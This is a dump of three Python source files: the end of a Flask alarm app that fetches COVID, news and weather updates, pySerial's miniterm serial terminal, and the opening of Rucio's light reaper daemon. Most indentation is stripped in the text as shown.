apiforarea = Cov19API(
filters=Area,
structure=cases_and_deaths,
latest_by="newCasesByPublishDate"
)
Areadata= apiforarea.get_json()
finalAreadata=Areadata['data']
newcasesbydate=finalAreadata[0]['newCasesByPublishDate']
newcasestotal=finalAreadata[0]['cumCasesByPublishDate']
    newdeathstoday=finalAreadata[0]['newDeathsByDeathDate']
totaldeath=finalAreadata[0]['cumDeathsByDeathDate']
strnewcasesbydate=str(newcasesbydate)
strnewcasestotal=str(newcasestotal)
    strnewdeathstoday=str(newdeathstoday)
strtotaldeath=str(totaldeath)
finalcovid=("In your area there has been "+ strnewcasesbydate +" cases, and a total of "+ strnewcasestotal + " new cases. For deaths there have been "+strnewdeathstoday+" today, and in total there have been "+strtotaldeath+".")
return listfornotification.append({'title':"Covid Update",'content':finalcovid})
def news():
script_dir=os.path.dirname(__file__)
relative='/config.json'
combined_file_path=script_dir+relative
with open(combined_file_path,'r') as config:
data=json.load(config)
API_KEY = data['APIKEYNEWS']
params = {'q': 'corona virus','source': 'bbc-news','sortBy': 'top','language': 'en',}
headers = {'X-Api-Key': API_KEY}
url = 'https://newsapi.org/v2/top-headlines'
response = requests.get(url, params=params, headers=headers)
responsedata = response.json()
article = responsedata["articles"]
results = [arr["title"] for arr in article]
finalresults=((results[1]),results[2],results[3],results[4],results[5],results[6])
resultsinline=(" ☞ ".join(finalresults))
return listfornotification.append({'title':"Top Headlines",'content':resultsinline})
def clock():
yearnow=str(datetime.datetime.now().year)
monthnow=str(datetime.datetime.now().month).zfill(2)
    datenow=str(datetime.datetime.now().day).zfill(2)
hournow=str(datetime.datetime.now().hour).zfill(2)
minutenow=str(datetime.datetime.now().minute).zfill(2)
fulldatenow="0"+datenow+"-"+monthnow+"-"+yearnow+" at "+hournow+":"+minutenow
return('You have an alarm set for '+fulldatenow)
def notif_update():
if str(datetime.datetime.now().minute).zfill(2)=="59":
news()
weather()
def get_time():
alarm_time=request.args.get('alarm')
close=request.args.get('alarm_item')
label=update_label()
while alarm_time:
        news_inc=request.args.get('news')
        weather_inc=request.args.get('weather')
year=alarm_time[0]+alarm_time[1]+alarm_time[2]+alarm_time[3]
month=alarm_time[5]+alarm_time[6]
date=alarm_time[8]+alarm_time[9]
hour=alarm_time[11]+alarm_time[12]
minute=alarm_time[14]+alarm_time[15]
fulldate=date+"-"+month+"-"+year+" at "+hour+":"+minute
if alarm_time and not news_inc and not weather_inc:
return listforalarm.append({'title':label,'content':'You have an alarm set for '+fulldate})
if alarm_time and news_inc and not weather_inc:
return listforalarm.append({'title':label,'content':'You have an alarm set for '+fulldate+" with "+news_inc})
if alarm_time and weather_inc and not news_inc:
return listforalarm.append({'title':label,'content':'You have an alarm set for '+fulldate+" with "+weather_inc})
if alarm_time and news_inc and weather_inc:
return listforalarm.append({'title':label,'content':'You have an alarm set for '+fulldate+" with "+news_inc+" and "+weather_inc})
else:
if close:
del listforalarm[a]
def do_alarm():
    if not listforalarm:
        return
    if clock()==listforalarm[0]['content']:
covid_update()
tts_request("You have an Alarm Update")
del listforalarm[0]
    elif clock()+" with news"==listforalarm[0]['content']:
news()
covid_update()
tts_request("You have an Alarm Update")
del listforalarm[0]
    elif clock()+" with weather"==listforalarm[0]['content']:
weather()
covid_update()
tts_request("You have an Update")
del listforalarm[0]
    elif clock()+" with news and weather"==listforalarm[0]['content']:
news()
weather()
covid_update()
tts_request("You have an Update")
del listforalarm[0]
def alarm_run():
while True:
notif_update()
(do_alarm())
time.sleep(59)
thread = threading.Thread(target=alarm_run)
thread.start()
def update_label():
label=request.args.get('two')
if label:
return label
if __name__=='__main__':
app.run()
|
miniterm.py
|
#!/Users/pmorvay/Documents/Cisco/Devnet/nornir/venv/bin/python3.7
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
    # switch terminal temporarily to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
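# Added usage sketch (illustrative only): the context manager above temporarily
# restores normal terminal mode, e.g. to prompt the user, and re-enters raw
# single-character mode on exit:
#   console = Console()
#   console.setup()              # raw mode, no echo
#   with console:                # cleanup() on enter, setup() on exit
#       answer = raw_input('Port? ')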
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
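# Illustrative sketch (not part of pySerial): how the transformations above are chained on
# transmit; the CR transform maps LF to CR and DebugIO traces the data. Demonstration only.
def _example_transformations():
    text = 'show version\n'
    for transformation in [CR(), DebugIO()]:
        text = transformation.tx(text)
    assert text == 'show version\r'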
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
        elif c == '7':                          # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
        elif c in 'sS':                         # S -> change to space parity (unreachable: 'sS' is consumed by suspend_port above)
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from another script,
# e.g. to create a miniterm-my-device.py (a hypothetical wrapper sketch follows main() below)
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
        parser.error('--exit-char cannot be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
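# Illustrative sketch (not part of pySerial): the default_* arguments of main() let a thin
# wrapper script, e.g. a hypothetical miniterm-my-device.py, preconfigure the terminal.
# The port name and baud rate below are placeholder assumptions.
def _example_device_wrapper():
    main(default_port='/dev/ttyUSB0', default_baudrate=115200)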
if __name__ == '__main__':
main()
|
light_reaper.py
|
# Copyright 2016-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2016-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2019
#
# PY3K COMPATIBLE
'''
Light Reaper is a daemon to manage temporary object/file deletion.
'''
import hashlib
import logging
import os
import random
import socket
import sys
import threading
import time
import traceback
from rucio.common.config import config_get
from rucio.common.exception import (SourceNotFound, DatabaseException, ServiceUnavailable,
RSEAccessDenied, ResourceTemporaryUnavailable)
from rucio.core import rse as rse_core
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.temporary_did import (list_expired_temporary_dids, delete_temporary_dids)
from rucio.rse import rsemanager as rsemgr
logging.getLogger("requests").setLevel(logging.CRITICAL)
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
GRACEFUL_STOP = threading.Event()
